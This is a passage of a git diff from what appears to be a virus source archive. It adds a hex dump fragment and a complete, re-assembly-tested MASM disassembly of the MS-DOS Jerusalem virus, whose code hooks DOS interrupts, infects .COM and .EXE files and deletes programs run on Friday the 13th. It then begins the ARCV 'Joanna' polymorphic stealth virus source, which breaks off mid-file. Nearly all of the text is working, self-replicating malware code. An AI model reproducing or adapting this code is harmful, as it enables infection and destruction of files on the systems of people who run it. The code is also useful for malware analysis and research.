+;0200 00 2E FF 2E 47 00 33 C0-8E C0 26 A1 FC 03 2E A3 ....G.3@.@&!|..# +;0210 4B 00 26 A0 FE 03 2E A2-4D 00 26 C7 06 FC 03 F3 K.& ~.."M.&G.|.s +;0220 A5 26 C6 06 FE 03 CB 58-05 10 00 8E C0 0E 1F B9 %&F.~.KX....@..9 +;0230 10 07 D1 E9 33 F6 8B FE-06 B8 42 01 50 EA FC 03 ..Qi3v.~.8B.Pj|. +;0240 00 00 8C C8 8E D0 BC 00-07 33 C0 8E D8 2E A1 4B ...H.P<..3@.X.!K +;0250 00 A3 FC 03 2E A0 4D 00-A2 FE 03 8B DC B1 04 D3 .#|.. M."~..\1.S +;0260 EB 83 C3 10 2E 89 1E 33-00 B4 4A 2E 8E 06 31 00 k.C....3.4J...1. +;0270 CD 21 B8 21 35 CD 21 2E-89 1E 17 00 2E 8C 06 19 M!8!5M!......... +;0280 00 0E 1F BA 5B 02 B8 21-25 CD 21 8E 06 31 00 26 ...:[.8!%M!..1.& +;0290 8E 06 2C 00 33 FF B9 FF-7F 32 C0 F2 AE 26 38 05 ..,.3.9..2@r.&8. +;02A0 E0 F9 8B D7 83 C2 03 B8-00 4B 06 1F 0E 07 BB 35 `y.W.B.8.K....;5 +;02B0 00 1E 06 50 53 51 52 B4-2A CD 21 2E C6 06 0E 00 ...PSQR4*M!.F... +;02C0 00 81 F9 C3 07 74 30 3C-05 75 0D 80 FA 0D 75 08 ..yC.t0<.u..z.u. +;02D0 2E FE 06 0E 00 EB 20 90-B8 08 35 CD 21 2E 89 1E .~...k .8.5M!... +;02E0 13 00 2E 8C 06 15 00 0E-1F C7 06 1F 00 90 7E B8 .........G....~8 +;02F0 08 25 BA 1E 02 CD 21 5A-59 5B 58 07 1F 9C 2E FF .%:..M!ZY[X..... +;0300 1E 17 00 1E 07 B4 49 CD-21 B4 4D CD 21 B4 31 BA .....4IM!4MM!41: +;0310 00 06 B1 04 D3 EA 83 C2-10 CD 21 32 C0 CF 2E 83 ..1.Sj.B.M!2@O.. +;0320 3E 1F 00 02 75 17 50 53-51 52 55 B8 02 06 B7 87 >...u.PSQRU8.. \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.jerusalm.asm b/MSDOS/Virus.MSDOS.Unknown.jerusalm.asm new file mode 100644 index 00000000..01e54400 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.jerusalm.asm @@ -0,0 +1,797 @@ + ; The 'Jerusalem' virus + + ; Disassembled by Joe Hirst (Tel: 0273-26105) January 1989. + + ; The disassembly has been tested by re-assembly using MASM 5.0 + +RAM SEGMENT AT 0 + + ; System data + + ORG 3FCH +BW03FC DW ? +BB03FE DB ? + + ORG 2CH +ENV_SG DW ? ; Segment address of environment + +RAM ENDS + +CODE SEGMENT BYTE PUBLIC 'CODE' + ASSUME CS:CODE,DS:NOTHING,ES:RAM + +START: JMP BP0010 + + DB 'sU' + +VR_SIG DB 'MsDos' + +VIR_RT EQU THIS DWORD +V_RTOF DW 0100H +V_RTSG DW 1C26H +DEL_SW DB 0 ; Delete program switch +BEGIN DW 0 ; Initial value for AX +F_SIZE DW 2A74H ; Total file size + +INT_08 EQU THIS DWORD +I08OFF DW 00ABH ; Int 8 offset +I08SEG DW 17CDH ; Int 8 segment + +INT_21 EQU THIS DWORD +I21OFF DW 1460H ; Int 21H offset +I21SEG DW 029FH ; Int 21H segment + +INT_24 EQU THIS DWORD +I24OFF DW 0556H ; Int 24H offset +I24SEG DW 189BH ; Int 24H segment + +TCOUNT DW 3A53H ; Timer count + + ; Fields passed by spare virus call + +SPAR01 DW 0 ; 00 Spare call field 1 - AX +SP_RET EQU THIS DWORD +SPAR02 DW 0 ; 02 Spare call field 2 - IP +SPAR03 DW 0 ; 04 Spare call field 3 - CS +SPAR04 DW 0 ; 06 Spare call field 4 - SP +SPAR05 DW 0 ; 08 Spare call field 5 - SS +SPAR06 DW 0 ; 0A Spare call field 6 +SPAR07 DW 0 ; 0C Spare call field 7 +SPAR08 DW 0 ; 0E Spare call field 8 + +ST_ES1 DW 1BB5H ; Original ES +SET_PA DW 0080H + + ; Program parameter block + +PPB_01 DW 0 ; Environment address +PPB_02 DW 0080H ; Command line offset +PPB_03 DW 1BB5H ; Command line segment +PPB_04 DW 005CH ; FCB1 offset +PPB_05 DW 1BB5H ; FCB1 segment +PPB_06 DW 006CH ; FCB2 offset +PPB_07 DW 1BB5H ; FCB2 segment + +PRG_SP DW 0710H ; Initial stack pointer store +PRG_SS DW 14EDH ; Initial stack segment store +PROGRM EQU THIS DWORD +PRGOFF DW 00C5H ; Initial code offset store +PRGSEG DW 14EDH ; Initial code segment store +SS_ST1 DW 0246H +SS_ST2 DB 00A1H +EXE_SW DB 0 ; EXE switch - 0 = .COM extension + + ; .EXE header store + +EXEHED DB 4DH, 5AH ; 00 .EXE header ident +EXHD01 DW 00F0H ; 02 Bytes in last page +EXHD02 DW 00B2H ; 04 Size of file in pages +EXHD03 DW 0138H ; 06 Number of relocation entries +EXHD04 DW 0060H ; 08 Size of header in paragraphs +EXHD05 DW 06D3H ; 0A Minimum extra storage required +EXHD06 DW -1 ; 0C Maximum extra storage required +EXHD07 DW 155EH ; 0E Initial stack segment +EXHD08 DW 0710H ; 10 Initial stack pointer +EXHD09 DW 1984H ; 12 Negative checksum +EXHD10 DW 00C5H ; 14 Initial code offset +EXHD11 DW 155EH ; 16 Initial code segment + DB 01EH, 000H, 000H, 000H + +SIGBUF DB 037H, 020H, 02AH, 02AH, 02AH +F_HAND DW 5 ; File handle +F_ATTS DW 0020H ; File attributes +F_DATE DW 0F30H ; File date +F_TIME DW 6000H ; File time +BYTSEC DW 0200H ; Bytes per sector +PARAGR DW 0010H ; Size of a paragraph +F_SIZ1 DW 5BE0H ; Low-order file size +F_SIZ2 DW 1 ; High-order file size +F_PATH EQU THIS DWORD +FPTHOF DW 41B9H ; Program pathname offset +FPTHSG DW 9B2AH ; Program pathname segment +COM_CM DB 'COMMAND.COM' +MEM_SW DW 1 ; Memory allocated switch + DB 4 DUP (0) + + ; This section seems to assume a COM origin of 100H + +BP0010: + CLD + MOV AH,0E0H ; Virus "are you there" call + INT 21H ; DOS service (Virus - 1) + CMP AH,0E0H ; Test for unchanged + JNB BP0020 ; Branch if invalid reply + CMP AH,3 ; Test for standard "yes" + JB BP0020 ; Branch if non-standard + MOV AH,0DDH ; Replace program + MOV DI,0100H ; Initial offset + MOV SI,OFFSET ENDADR ; Length of virus + ADD SI,DI ; Add initial offset + MOV CX,CS:F_SIZE[DI] ; Get total filesize + INT 21H ; DOS service (Virus - 2) +BP0020: + MOV AX,CS ; Get current segment + ADD AX,10H ; Address past PSP + MOV SS,AX ; \ Set up stack + MOV SP,0700H ; / + PUSH AX ; Segment for return + MOV AX,OFFSET BP0030 ; \ Offset for return + PUSH AX ; / + RETF ; "Return" to next instruction + + ; We now have an origin of zero + +BP0030: + CLD + PUSH ES + MOV ST_ES1,ES ; Save original ES + MOV PPB_03,ES ; \ + MOV PPB_05,ES ; ) Segments in PPB + MOV PPB_07,ES ; / + MOV AX,ES ; \ Segment relocation factor + ADD AX,10H ; / + ADD PRGSEG,AX ; Initial code segment store + ADD PRG_SS,AX ; Initial stack segment store + MOV AH,0E0H ; Virus "are you there" call + INT 21H ; DOS service (Virus - 1) + CMP AH,0E0H ; Test for unchanged + JNB BP0040 ; Branch if not + CMP AH,3 ; Test for standard "yes" + POP ES + MOV SS,PRG_SS ; Initial stack segment store + MOV SP,PRG_SP ; Initial stack pointer store + JMP PROGRM ; Start of actual program + + ; Virus is not already active + +BP0040: + XOR AX,AX ; \ Address page zero + MOV ES,AX ; / + MOV AX,BW03FC ; \ Save system area data (1) + MOV SS_ST1,AX ; / + MOV AL,BB03FE ; \ Save system area data (2) + MOV SS_ST2,AL ; / + MOV BW03FC,0A5F3H ; Store REPZ MOVSW + MOV BB03FE,0CBH ; Store RETF + POP AX ; \ + ADD AX,10H ; ) Address past PSP + MOV ES,AX ; / + PUSH CS ; \ Set DS to CS + POP DS ; / + MOV CX,OFFSET ENDADR ; Length of virus + SHR CX,1 ; Divide by two (word parameter) + XOR SI,SI + MOV DI,SI + PUSH ES + MOV AX,OFFSET BP0050 + PUSH AX + DB 0EAH ; \ Far jump to move instruction + DW BW03FC, 0 ; / + +BP0050: + MOV AX,CS + MOV SS,AX + MOV SP,0700H + XOR AX,AX ; \ Address page zero + MOV DS,AX ; / + ASSUME DS:RAM,ES:NOTHING + MOV AX,SS_ST1 ; \ Restore system area data (1) + MOV BW03FC,AX ; / + MOV AL,SS_ST2 ; \ Restore system area data (2) + MOV BB03FE,AL ; / + MOV BX,SP + MOV CL,4 + SHR BX,CL + ADD BX,10H + MOV SET_PA,BX ; Save number of paragraphs + MOV AH,4AH ; Set block + MOV ES,ST_ES1 ; Get original ES + INT 21H ; DOS service (Set block) + MOV AX,3521H ; Get interrupt 21H + INT 21H ; DOS service (Get int) + MOV I21OFF,BX ; Save interrupt 21H offset + MOV I21SEG,ES ; Save interrupt 21H segment + PUSH CS ; \ Set DS to CS + POP DS ; / + ASSUME DS:CODE + MOV DX,OFFSET BP0130 ; Interrupt 21H routine + MOV AX,2521H ; Set interrupt 21H + INT 21H ; DOS service (Set int) + MOV ES,ST_ES1 ; Get original ES + ASSUME ES:RAM + MOV ES,ES:ENV_SG ; Get environment segment + XOR DI,DI ; Start of environment + MOV CX,7FFFH ; Allow for 32K environment + XOR AL,AL ; Search for zero +BP0060: + REPNZ SCASB ; Find zero + CMP ES:[DI],AL ; Is following character zero + LOOPNZ BP0060 ; Search again if not + MOV DX,DI ; Save pointer + ADD DX,3 ; Address pathname + MOV AX,4B00H ; Load and execute program + PUSH ES ; \ Set DS to ES + POP DS ; / + PUSH CS ; \ Set ES to CS + POP ES ; / + ASSUME DS:RAM,ES:NOTHING + MOV BX,OFFSET PPB_01 ; PPB (for load and execute) + PUSH DS + PUSH ES + PUSH AX + PUSH BX + PUSH CX + PUSH DX + MOV AH,2AH ; Get date + INT 21H ; DOS service (Get date) + MOV DEL_SW,0 ; Set delete program switch off + CMP CX,07C3H ; Year = 1987 + JZ BP0080 ; Branch if yes + CMP AL,5 ; Day of week = Friday + JNZ BP0070 ; Branch if not + CMP DL,0DH ; Day of month = 13 + JNZ BP0070 ; Branch if not + INC DEL_SW ; Set delete program switch on + JMP BP0080 + +BP0070: + MOV AX,3508H ; Get interrupt 8 + INT 21H ; DOS service (Get int) + MOV I08OFF,BX ; Save interrupt 8 offset + MOV I08SEG,ES ; Save interrupt 8 segment + PUSH CS ; \ Set DS to CS + POP DS ; / + ASSUME DS:CODE + MOV TCOUNT,7E90H ; Start clock count (30 mins) + MOV AX,2508H ; Set interrupt 8 + MOV DX,OFFSET BP0100 ; Interrupt 8 routine + INT 21H ; DOS service (Set int) +BP0080: + POP DX + POP CX + POP BX + POP AX + POP ES + POP DS + ASSUME DS:NOTHING + PUSHF ; Fake an interrupt + CALL INT_21 ; Interrupt 21H (Load and execute) + PUSH DS ; \ Set ES to DS + POP ES ; / + MOV AH,49H ; Free allocated memory + INT 21H ; DOS service (Free memory) + MOV AH,4DH ; Get return code of child process + INT 21H ; DOS service (Get return code) + MOV AH,31H ; Keep process + MOV DX,OFFSET ENDKEEP ; Length of program + MOV CL,4 ; \ Convert to paragraphs + SHR DX,CL ; / + ADD DX,10H ; And another 256 bytes + INT 21H ; DOS service (Keep process) + + ; Interrupt 24H + +BP0090: + XOR AL,AL ; Ignore the error + IRET + + ; Interrupt 8 + +BP0100: + CMP TCOUNT,2 ; Is timer ready + JNZ BP0110 ; Branch if not + PUSH AX + PUSH BX + PUSH CX + PUSH DX + PUSH BP + MOV AX,0602H ; Scroll up two lines + MOV BH,87H ; Blinking white on black + MOV CX,0505H ; Start row 5 column 5 + MOV DX,1010H ; End row 16 column 16 + INT 10H ; VDU I/O + POP BP + POP DX + POP CX + POP BX + POP AX +BP0110: + DEC TCOUNT ; Subtract from timer count + JNZ BP0120 ; Branch if not zero + MOV TCOUNT,1 ; Set back to one + PUSH AX + PUSH CX + PUSH SI + MOV CX,4001H ; \ Waste some time + REPZ LODSB ; / + POP SI + POP CX + POP AX +BP0120: + JMP INT_08 ; Interrupt 8 + + ; Interrupt 21H + +BP0130: + PUSHF + CMP AH,0E0H ; Virus "are you there" call + JNZ BP0140 ; Branch if other call + MOV AX,0300H ; Standard "yes" + POPF + IRET + +BP0140: + CMP AH,0DDH ; Virus replace program call + JZ BP0160 ; Branch if yes + CMP AH,0DEH ; Virus spare call + JZ BP0170 ; Branch if yes + CMP AX,4B00H ; Is it load and execute + JNZ BP0150 ; Branch if not + JMP BP0210 ; Process load and execute + +BP0150: + POPF + JMP CS:INT_21 ; Interrupt 21H + + ; Replace program call + +BP0160: + POP AX + POP AX ; Retrieve return offset + MOV AX,100H ; Replace with start address + MOV V_RTOF,AX ; Store in return jump + POP AX ; Retrieve return segment + MOV V_RTSG,AX ; Store in return jump + REPZ MOVSB ; Restore program to beginning + POPF + MOV AX,BEGIN ; Start with zero register + JMP VIR_RT ; Start actual program + + ; Spare virus call + +BP0170: + ADD SP,6 ; Remove three words from stack + POPF + MOV AX,CS ; \ + MOV SS,AX ; ) Set up internal stack + MOV SP,OFFSET ENDADR ; / + PUSH ES + PUSH ES + XOR DI,DI + PUSH CS ; \ Set ES to CS + POP ES ; / + MOV CX,10H ; Length to move + MOV SI,BX + MOV DI,OFFSET SPAR01 + REPZ MOVSB ; Copy to SPAR01-SPAR08 inclusive + MOV AX,DS ; \ Set ES to DS + MOV ES,AX ; / + MUL PARAGR ; Size of a paragraph + ADD AX,SPAR06 ; \ Add + ADC DX,0 ; / + DIV PARAGR ; Size of a paragraph + MOV DS,AX + MOV SI,DX + MOV DI,DX + MOV BP,ES ; Save ES + MOV BX,SPAR08 + OR BX,BX + JZ BP0190 +BP0180: + MOV CX,8000H + REPZ MOVSW + ADD AX,1000H + ADD BP,1000H + MOV DS,AX + MOV ES,BP ; Restore ES + DEC BX + JNZ BP0180 +BP0190: + MOV CX,SPAR07 + REPZ MOVSB + POP AX ; Recover ES + PUSH AX ; Put it back again + ADD AX,10H ; Address past PSP + ADD SPAR05,AX ; Relocate SS + ADD SPAR03,AX ; Relocate ? + MOV AX,SPAR01 + POP DS + POP ES + MOV SS,SPAR05 + MOV SP,SPAR04 + JMP SP_RET + + ; Friday 13th - Delete program + +BP0200: + XOR CX,CX ; No attributes + MOV AX,4301H ; Set file attributes + INT 21H ; DOS service (Set attributes) + MOV AH,41H ; Delete directory entry + INT 21H ; DOS service (Delete entry) + MOV AX,4B00H ; Load and execute program + POPF + JMP INT_21 ; Interrupt 21H + + ; Process load and execute program + +BP0210: + CMP DEL_SW,1 ; Test delete program switch + JZ BP0200 ; Branch to delete if on + MOV F_HAND,-1 ; No file handle + MOV MEM_SW,0 ; Set off memory allocated switch + MOV FPTHOF,DX ; Save pathname offset + MOV FPTHSG,DS ; Save pathname segment + PUSH AX + PUSH BX + PUSH CX + PUSH DX + PUSH SI + PUSH DI + PUSH DS + PUSH ES + CLD + MOV DI,DX ; Point to file pathname + XOR DL,DL ; Default drive + CMP BYTE PTR [DI+1],3AH ; Test second character for ':' + JNZ BP0220 ; Branch if not + MOV DL,[DI] ; Get drive letter + AND DL,1FH ; Convert to number +BP0220: + MOV AH,36H ; Get disk free space + INT 21H ; DOS service (Get disk free) + CMP AX,-1 ; Test for invalid drive + JNZ BP0240 ; Branch if not +BP0230: + JMP BP0500 ; Terminate + +BP0240: + MUL BX ; Calc number of free sectors + MUL CX ; Calc number of free bytes + OR DX,DX ; Test high word of result + JNZ BP0250 ; Branch if not zero + CMP AX,OFFSET ENDADR ; Length of virus + JB BP0230 ; Terminate if less +BP0250: + MOV DX,FPTHOF ; Get pathname offset + PUSH DS ; \ Set ES to DS + POP ES ; / + XOR AL,AL ; Test character - zero + MOV CX,41H ; Maximum pathname length + REPNZ SCASB ; Find end of pathname + MOV SI,FPTHOF ; Get pathname offset +BP0260: + MOV AL,[SI] ; Get pathname character + OR AL,AL ; Test for a character + JZ BP0280 ; Finish if none + CMP AL,61H ; Test for 'a' + JB BP0270 ; Branch if less + CMP AL,7AH ; Test for 'z' + JA BP0270 ; Branch if above + SUB BYTE PTR [SI],20H ; Convert to uppercase +BP0270: + INC SI ; Address next character + JMP BP0260 ; Process next character + +BP0280: + MOV CX,0BH ; Load length 11 + SUB SI,CX ; Address back by length + MOV DI,OFFSET COM_CM ; 'COMMAND.COM' + PUSH CS ; \ Set ES to CS + POP ES ; / + MOV CX,0BH ; Load length again + REPZ CMPSB ; Compare + JNZ BP0290 ; Continue if not command.com + JMP BP0500 ; Terminate + +BP0290: + MOV AX,4300H ; Get file attributes + INT 21H ; DOS service (Get attributes) + JB BP0300 ; Follow chain of error branches + MOV F_ATTS,CX ; Save file attributes +BP0300: + JB BP0320 ; Follow chain of error branches + XOR AL,AL ; Scan character - zero + MOV EXE_SW,AL ; Set EXE switch off + PUSH DS ; \ Set ES to DS + POP ES ; / + MOV DI,DX ; Pointer to pathname + MOV CX,41H ; Maximum pathname length + REPNZ SCASB ; Find end of pathname + CMP BYTE PTR [DI-2],4DH ; Is last letter 'M' + JZ BP0310 ; Branch if yes + CMP BYTE PTR [DI-2],6DH ; Is last letter 'm' + JZ BP0310 ; Branch if yes + INC EXE_SW ; Set EXE switch on +BP0310: + MOV AX,3D00H ; Open handle, read only + INT 21H ; DOS service (Open handle) +BP0320: + JB BP0340 ; Follow chain of error branches + MOV F_HAND,AX ; Save file handle + MOV BX,AX ; File handle + MOV AX,4202H ; Move file pointer + MOV CX,-1 ; \ End of file minus 5 + MOV DX,-5 ; / + INT 21H ; DOS service (Move pointer) + JB BP0320 ; Follow chain of error branches + ADD AX,5 ; Total file size + MOV F_SIZE,AX ; Save total file size + MOV CX,5 ; Length to read + MOV DX,OFFSET SIGBUF ; Infection test buffer + MOV AX,CS ; \ + MOV DS,AX ; ) Make DS & ES same as CS + MOV ES,AX ; / + ASSUME DS:CODE + MOV AH,3FH ; Read handle + INT 21H ; DOS service (Read handle) + MOV DI,DX ; Address test buffer + MOV SI,OFFSET VR_SIG ; Signature + REPZ CMPSB ; Compare signatures + JNZ BP0330 ; Branch if not infected + MOV AH,3EH ; Close handle + INT 21H ; DOS service (Close handle) + JMP BP0500 ; Terminate + +BP0330: + MOV AX,3524H ; Get interrupt 24H + INT 21H ; DOS service (Get int) + MOV I24OFF,BX ; Save interrupt 24H offset + MOV I24SEG,ES ; Save interrupt 24H segment + MOV DX,OFFSET BP0090 ; Interrupt 24H routine + MOV AX,2524H ; Set interrupt 24H + INT 21H ; DOS service (Set int) + LDS DX,F_PATH ; Address program pathname + XOR CX,CX ; No attributes + MOV AX,4301H ; Set file attributes + INT 21H ; DOS service (Set attributes) + ASSUME DS:NOTHING +BP0340: + JB BP0350 ; Follow chain of error branches + MOV BX,F_HAND ; Get file handle + MOV AH,3EH ; Close handle + INT 21H ; DOS service (Close handle) + MOV F_HAND,-1 ; No file handle + MOV AX,3D02H ; Open handle read/write + INT 21H ; DOS service (Open handle) + JB BP0350 ; Follow chain of error branches + MOV F_HAND,AX ; Save file handle + MOV AX,CS ; \ + MOV DS,AX ; ) Make DS & ES same as CS + MOV ES,AX ; / + ASSUME DS:CODE + MOV BX,F_HAND ; Get file handle + MOV AX,5700H ; Get file date and time + INT 21H ; DOS service (Get file date) + MOV F_DATE,DX ; Save file date + MOV F_TIME,CX ; Save file time + MOV AX,4200H ; Move file pointer + XOR CX,CX ; \ Beginning of file + MOV DX,CX ; / + INT 21H ; DOS service (Move pointer) +BP0350: + JB BP0380 ; Follow chain of error branches + CMP EXE_SW,0 ; Test EXE switch + JZ BP0360 ; Branch if off + JMP BP0400 + + ; .COM file processing + +BP0360: + MOV BX,1000H ; 64K of memory wanted + MOV AH,48H ; Allocate memory + INT 21H ; DOS service (Allocate memory) + JNB BP0370 ; Branch if successful + MOV AH,3EH ; Close handle + MOV BX,F_HAND ; Get file handle + INT 21H ; DOS service (Close handle) + JMP BP0500 ; Terminate + +BP0370: + INC MEM_SW ; Set on memory allocated switch + MOV ES,AX ; Segment of allocated memory + XOR SI,SI ; Start of virus + MOV DI,SI ; Start of allocated memory + MOV CX,OFFSET ENDADR ; Length of virus + REPZ MOVSB ; Copy virus to allocated + MOV DX,DI ; Address after virus + MOV CX,F_SIZE ; Total file size + MOV BX,F_HAND ; Get file handle + PUSH ES ; \ Set DS to ES + POP DS ; / + MOV AH,3FH ; Read handle + INT 21H ; DOS service (Read handle) +BP0380: + JB BP0390 ; Follow chain of error branches + ADD DI,CX ; Add previous file size + XOR CX,CX ; \ Beginning of file + MOV DX,CX ; / + MOV AX,4200H ; Move file pointer + INT 21H ; DOS service (Move pointer) + MOV SI,OFFSET VR_SIG ; Signature + MOV CX,5 ; Length to move + REPZ MOVS [DI],CS:VR_SIG ; Copy signature to end + MOV CX,DI ; Length to write + XOR DX,DX ; Start of allocated + MOV AH,40H ; Write handle + INT 21H ; DOS service (Write handle) +BP0390: + JB BP0410 ; Follow chain of error branches + JMP BP0480 ; Free memory and reset values + + ; .EXE file processing + +BP0400: + MOV CX,1CH ; Length of EXE header + MOV DX,OFFSET EXEHED ; .EXE header store + MOV AH,3FH ; Read handle + INT 21H ; DOS service (Read handle) +BP0410: + JB BP0430 ; Follow chain of error branches + MOV EXHD09,1984H ; Negative checksum + MOV AX,EXHD07 ; \ Store initial stack segment + MOV PRG_SS,AX ; / + MOV AX,EXHD08 ; \ Store initial stack pointer + MOV PRG_SP,AX ; / + MOV AX,EXHD10 ; \ Store initial code offset + MOV PRGOFF,AX ; / + MOV AX,EXHD11 ; \ Store initial code segment + MOV PRGSEG,AX ; / + MOV AX,EXHD02 ; Get size of file in pages + CMP EXHD01,0 ; Number of bytes in last page + JZ BP0420 ; Branch if none + DEC AX ; One less page +BP0420: + MUL BYTSEC ; Bytes per sector + ADD AX,EXHD01 ; \ Add bytes in last page + ADC DX,0 ; / + ADD AX,0FH ; \ Round up + ADC DX,0 ; / + AND AX,0FFF0H ; Clear bottom figure + MOV F_SIZ1,AX ; Save low-order file size + MOV F_SIZ2,DX ; Save high-order file size + ADD AX,OFFSET ENDADR ; \ Add virus length + ADC DX,0 ; / +BP0430: + JB BP0450 ; Follow chain of error branches + DIV BYTSEC ; Bytes per sector + OR DX,DX ; Test odd bytes + JZ BP0440 ; Branch if none + INC AX ; One more page for odd bytes +BP0440: + MOV EXHD02,AX ; Store size of file in pages + MOV EXHD01,DX ; Store bytes in last page + MOV AX,F_SIZ1 ; Low-order file size + MOV DX,F_SIZ2 ; High-order file size + DIV PARAGR ; Size of a paragraph + SUB AX,EXHD04 ; Size of header in paragraphs + MOV EXHD11,AX ; Initial code segment + MOV EXHD10,OFFSET BP0030 ; Initial code offset + MOV EXHD07,AX ; Initial stack segment + MOV EXHD08,OFFSET ENDADR ; Initial stack pointer + XOR CX,CX ; \ Beginning of file + MOV DX,CX ; / + MOV AX,4200H ; Move file pointer + INT 21H ; DOS service (Move pointer) +BP0450: + JB BP0460 ; Follow chain of error branches + MOV CX,1CH ; Length of EXE header + MOV DX,OFFSET EXEHED ; .EXE header store + MOV AH,40H ; Write handle + INT 21H ; DOS service (Write handle) +BP0460: + JB BP0470 ; Follow chain of error branches + CMP AX,CX ; Has same length been written + JNZ BP0480 ; Branch if not + MOV DX,F_SIZ1 ; Low-order file size + MOV CX,F_SIZ2 ; High-order file size + MOV AX,4200H ; Move file pointer + INT 21H ; DOS service (Move pointer) +BP0470: + JB BP0480 ; Follow chain of error branches + XOR DX,DX ; Address beginning of virus + MOV CX,OFFSET ENDADR ; Length of virus + MOV AH,40H ; Write handle + INT 21H ; DOS service (Write handle) + ASSUME DS:NOTHING +BP0480: + CMP MEM_SW,0 ; Test memory allocated switch + JZ BP0490 ; Branch if off + MOV AH,49H ; Free allocated memory + INT 21H ; DOS service (Free memory) +BP0490: + CMP F_HAND,-1 ; Test file handle + JZ BP0500 ; Terminate if none + MOV BX,F_HAND ; Get file handle + MOV DX,F_DATE ; Get file date + MOV CX,F_TIME ; Get file time + MOV AX,5701H ; Set file date and time + INT 21H ; DOS service (Set file date) + MOV AH,3EH ; Close handle + INT 21H ; DOS service (Close handle) + LDS DX,F_PATH ; Address program pathname + MOV CX,F_ATTS ; Load file attributes + MOV AX,4301H ; Set file attributes + INT 21H ; DOS service (Set attributes) + LDS DX,INT_24 ; Original interrupt 24H address + MOV AX,2524H ; Set interrupt 24H + INT 21H ; DOS service (Set int) +BP0500: + POP ES + POP DS + POP DI + POP SI + POP DX + POP CX + POP BX + POP AX + POPF + JMP INT_21 ; Interrupt 21H + + DB 11 DUP (0) + +ENDKEEP EQU $ + + ; Stack area - rubbish + + DB 04DH, 09BH, 018H, 004H, 000H, 000H, 000H, 000H + DB 000H, 000H, 000H, 000H, 000H, 000H, 000H, 000H + DB 000H, 001H, 000H, 000H, 000H, 000H, 000H, 032H + DB 000H, 000H, 000H, 02FH, 000H, 0FFH, 0FFH, 0FFH + DB 0FFH, 0FFH, 0FFH, 0FFH, 0FFH, 0FFH, 0FFH, 0FFH + DB 0FFH, 0FFH, 0FFH, 0FFH, 0FFH, 0FFH, 0FFH, 043H + DB 03AH, 05CH, 041H, 055H, 054H, 04FH, 045H, 058H + DB 045H, 043H, 02EH, 042H, 041H, 054H, 000H, 061H + DB 075H, 074H, 06FH, 065H, 078H, 065H, 063H, 00DH + DB 000H, 0FFH, 0FFH, 0FFH, 000H, 000H, 000H, 000H + DB 04DH, 09BH, 018H, 000H, 010H, 09AH, 0F0H, 0FEH + DB 01DH, 0F0H, 02FH, 001H, 09BH, 018H, 03CH, 001H + DB 0E9H, 092H, 000H, 073H, 055H, 04DH, 073H, 044H + DB 06FH, 073H, 000H, 001H, 026H, 01CH, 000H, 000H + DB 000H, 074H, 02AH, 0ABH, 000H, 0CDH, 017H, 060H + DB 014H, 09FH, 002H, 056H, 005H, 09BH, 018H, 053H + DB 03AH, 000H, 000H, 000H, 000H, 000H, 000H, 000H + DB 000H, 000H, 000H, 000H, 000H, 000H, 000H, 000H + DB 000H, 0B5H, 01BH, 080H, 000H, 000H, 000H, 080H + DB 000H, 0B5H, 01BH, 05CH, 000H, 0B5H, 01BH, 06CH + DB 000H, 0B5H, 01BH, 010H, 007H, 0EDH, 014H, 0C5H + DB 000H, 0EDH, 014H, 046H, 002H, 0A1H, 000H, 04DH + DB 05AH, 0F0H, 000H, 0B2H, 000H, 038H, 001H, 060H + DB 000H, 0D3H, 006H, 0FFH, 0FFH, 05EH, 015H, 010H + DB 007H, 084H, 019H, 0C5H, 000H, 05EH, 015H, 01EH + DB 000H, 000H, 000H, 037H, 020H, 02AH, 02AH, 02AH + DB 005H, 000H, 020H, 000H, 030H, 00FH, 000H, 060H + DB 000H, 002H, 010H, 000H, 0E0H, 05BH, 001H, 000H + DB 0B9H, 041H, 02AH, 09BH, 043H, 04FH, 04DH, 04DH + DB 041H, 04EH, 044H, 02EH, 043H, 04FH, 04DH, 001H + DB 000H, 000H, 000H, 000H, 000H, 0FCH, 0B4H, 0E0H + DB 0CDH, 021H, 080H, 0FCH, 0E0H, 073H, 016H, 080H + DB 0FCH, 003H, 072H, 011H, 0B4H, 0DDH, 0BFH, 000H + DB 001H, 0BEH, 010H, 007H, 003H, 0F7H, 02EH, 08BH + +ENDADR EQU $ + +CODE ENDS + + END START + diff --git a/MSDOS/Virus.MSDOS.Unknown.jo1_11.asm b/MSDOS/Virus.MSDOS.Unknown.jo1_11.asm new file mode 100644 index 00000000..b96db356 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.jo1_11.asm @@ -0,0 +1,429 @@ + NAME Jo + PAGE 55,132 + TITLE Jo Virus. + +; +; This is Yet another virus from the ARCV, this one is called +; Joanna, it was written by Apache Warrior, ARCV President. +; +; It has Stealth features, it is a Resident infector of .COM files +; and uses the Cybertech Mutation Engine (TM) by Apache Warrior for +; its Polymorphic features. There is a maximum of 3 unchanged bytes +; in the Encrypted code. +; + +.model tiny + +code segment + + ASSUME CS:CODE,DS:CODE,ES:CODE + +int_21ofs equ 84h +int_21seg equ 86h +length equ offset handle-offset main +msglen equ offset oldstart-offset msg +tsrlen equ (offset findat-offset main)/10 +len equ offset handle-offset main +virlen equ (offset string-offset main2)/2 +decryptlen equ offset main2-offset main + + org 100h + +start: jmp main + db 0,0,0 + +main: mov si,offset main2 ; SI offset for decrypt + mov cx,virlen ; viri decrypt size +loop_1: + db 2eh,81h,2ch ; decrypt +switch: dw 0 + add si,02h + dec cx + jnz loop_1 +main2: call findoff ; find file ofset +findoff: pop si ; + sub si,offset findoff + push ds + push es + push cs + pop ds + push cs + pop es + mov ax,0ff05h ; Test for Scythe2 Boot + int 13h + cmp ah,0e9h ; Check for Scythe2 Boot + jnz haha ; no go on + mov ah,09h ; Display message + lea dx,[si+offset msg2] + int 21h + jmp $ ; Crash the machine +haha: mov ah,2ah ; Date Test + int 21h ; + cmp dx,1210h ; Is month the Oct. + jnz main3 ; no go on + mov ah,09h ; Display Message + lea dx,[si+offset msg] + int 21h + + +main3: mov di,0100h ; move old programs + push si ; start back to the start + mov ax,offset oldstart ; + add si,ax ; + mov cx,05h ; + cld ; + repz movsb ; + +inst: mov ax,0ffa4h ; check to see if already instaled + int 21h + pop si ; bring back si + cmp ax,42a1h + je oldprog ; Yes return to old program + +tt2: xor ax,ax ; Residency Routine + push ax + mov ax,ds ; Get MCB segment Address + dec ax ; + mov es,ax ; Put MCB segment Address in es + pop ds ; + mov ax,word ptr ds:int_21ofs ; Load Int 21h address data + mov cx,word ptr ds:int_21seg ; + mov word ptr cs:[si+int21],ax ; Move Int 21h data to store + mov word 